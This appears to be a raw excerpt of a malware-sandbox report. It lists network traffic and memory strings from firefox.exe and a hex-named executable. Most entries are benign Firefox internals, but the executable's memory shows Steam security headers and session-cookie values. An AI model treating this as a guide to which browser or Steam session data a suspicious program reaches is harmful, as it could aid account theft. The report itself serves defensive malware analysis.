Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'UpdateService:_selectAndInstallUpdate - prompting because silent install is disabled. Notifying observers. topic: update-available, status: show-promptmoz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/about_compat_broker.jsYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/spotify-embed.js equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'UpdateService:_selectAndInstallUpdate - prompting because silent install is disabled. Notifying observers. topic: update-available, status: show-promptmoz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/about_compat_broker.jsYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/spotify-embed.js equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'UpdateService:_selectAndInstallUpdate - prompting because silent install is disabled. Notifying observers. topic: update-available, status: show-promptmoz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/about_compat_broker.jsYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/spotify-embed.js equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://*.adsafeprotected.com/jsvid?*color-mix(in srgb, currentColor 9%, transparent)--autocomplete-popup-separator-color*://securepubads.g.doubleclick.net/gampad/*ad**://*.adsafeprotected.com/*/imp/*--panel-banner-item-update-supported-bgcolorhttps://en.wikipedia.org/wiki/Special:Search*resource://search-extensions/google/amazondotcom%40search.mozilla.org:1.6addons-search-detection@mozilla.com*://www.facebook.com/platform/impression.php*resource://search-extensions/wikipedia/toolkit.telemetry.send.overrideOfficialChecktoolkit.telemetry.untrustedModulesPing.frequency@mozilla.org/windows-registry-key;1firefox-compact-light@mozilla.orgfirefox-alpenglow%40mozilla.org:1.4TelemetrySession::onEnvironmentChangeresource://gre/modules/ctypes.sys.mjsdelayedInit/this._delayedInitTask<toolkit.telemetry.firstShutdownPing.enabledassemblePayloadWithMeasurements - reason: TELEMETRY_ASSEMBLE_PAYLOAD_EXCEPTIONtoolkit.telemetry.healthping.enabledresource://search-extensions/ddg/toolkit.telemetry.archive.enabledTELEMETRY_SESSIONDATA_FAILED_VALIDATIONtoolkit.telemetry.overrideUpdateChannelresource://gre/modules/AddonManager.sys.mjsresource://builtin-themes/alpenglow/_loadSessionData - session data is invalidresource://gre/modules/UpdateUtils.sys.mjsinternal-telemetry-after-subsession-splitresource://gre/modules/TelemetryUtils.sys.mjsfirefox-compact-light%40mozilla.org:1.2resource://search-extensions/bing/toolkit.telemetry.testing.disableFuzzingDelay equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://*.imgur.com/js/vendor.*.bundle.jshttps://smartblock.firefox.etp/play.svg*://*.imgur.io/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.js*://web-assets.toggl.com/app/assets/scripts/*.jsFileUtils_closeSafeFileOutputStream*://static.chartbeat.com/js/chartbeat_video.js*://pub.doubleverify.com/signals/pub.js**://static.chartbeat.com/js/chartbeat.js*://connect.facebook.net/*/all.js**://track.adform.net/serving/scripts/trackpoint/*://cdn.branch.io/branch-latest.min.js**://connect.facebook.net/*/sdk.js*https://smartblock.firefox.etp/facebook.svg*://c.amazon-adsystem.com/aax2/apstag.js*://www.google-analytics.com/analytics.js**://auth.9c9media.ca/auth/main.js*://static.criteo.net/js/ld/publishertag.js*://libs.coremetrics.com/eluminate.js*://www.google-analytics.com/gtm/js**://www.googletagmanager.com/gtm.js**://www.google-analytics.com/plugins/ua/ec.js*://s0.2mdn.net/instream/html5/ima3.jspictureinpicture%40mozilla.org:1.0.0*://ssl.google-analytics.com/ga.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://www.googletagservices.com/tag/js/gpt.js*FileUtils_closeAtomicFileOutputStreamwebcompat-reporter@mozilla.org.xpiwebcompat-reporter%40mozilla.org:1.5.1@mozilla.org/addons/addon-manager-startup;1*://www.everestjs.net/static/st.v3.js*resource://services-settings/IDBHelpers.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3258641939.00000137A69FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E616000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3257901918.00000137A6715000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3210751265.000001379F221000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F6F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F6FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: 976d9f40c1.exe, 0000000B.00000002.2923405378.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 976d9f40c1.exe, 00000009.00000003.2803479877.000000000172B000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806627641.000000000172B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ ht equals www.youtube.com (Youtube)
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cb9e7f3651c38ac41ccf738a8ba3498dc; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=5ebdd52ca9f7afc37ef8283d; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 23 Oct 2024 13:49:29 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WebChannel/this._originCheckCallbackDevToolsStartup.jsm:handleDebuggerFlagdevtools-commandkey-profiler-capture@mozilla.org/network/protocol;1?name=defaultFailed to listen. Listener already attached.Failed to execute WebChannel callback:browser and that URL. Falling back to devtools/client/framework/devtools-browserdevtools-commandkey-javascript-tracing-toggledevtools.debugger.features.javascript-tracing^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$devtools-commandkey-profiler-start-stopdevtools.performance.recording.ui-base-urlreleaseDistinctSystemPrincipalLoaderdevtools.performance.popup.feature-flagresource://devtools/server/devtools-server.jsdevtools/client/framework/devtoolsDevTools telemetry entry point failed: @mozilla.org/dom/slow-script-debug;1devtools.debugger.remote-websocket{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Got invalid request to save JSON dataFailed to listen. Callback argument missing.@mozilla.org/network/protocol;1?name=fileUnable to start devtools server on JSON Viewer's onSave failed in startPersistenceNo callback set for this channel.@mozilla.org/uriloader/handler-service;1and deploy previews URLs are allowed.resource://devtools/shared/security/socket.jsbrowser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNameshttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/dbus-handler-app;1https://mail.yahoo.co.jp/compose/?To=%s@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/FileUtils.sys.mjsresource://gre/modules/DeferredTask.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}Scheme should be either http or httpsresource://gre/modules/FileUtils.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/NetUtil.sys.mjsisDownloadsImprovementsAlreadyMigratedhttp://poczta.interia.pl/mh/?mailto=%sget FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPhttps://poczta.interia.pl/mh/?mailto=%s^([a-z+.-]+:\/{0,3})*([^\/@]+@).+http://www.inbox.lv/rfc2368/?value=%sget FIXUP_FLAG_FORCE_ALTERNATE_URICan't invoke URIFixup in the content processextractScheme/fixupChangedProtocol<resource://gre/modules/JSONFile.sys.mjsgecko.handlerService.defaultHandlersVersionbrowser.fixup.domainsuffixwhitelist.http://win.mail.ru/cgi-bin/sentmsg?mailto=%s_injectDefaultProtocolHandlersIfNeeded@mozilla.org/uriloader/local-handler-app;1^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)get FIXUP_FLAGS_MAKE_ALTERNATE_URIhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.inbox.lv/compose?to=%s@mozilla.org/network/file-input-stream;1resource://gre/modules/JSONFile.sys.mjsresource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1Must have a source and a callback@mozilla.org/network/simple-stream-listener;1@mozilla.org/network/input-stream-pump;1newChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLFirst argument should be an nsIInputStreamNon-zero amount of bytes must be specified@mozilla.org/intl/c
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3210299308.000001379F108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3210299308.000001379F104000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A955000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000019.00000002.3183838665.000001379A955000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", 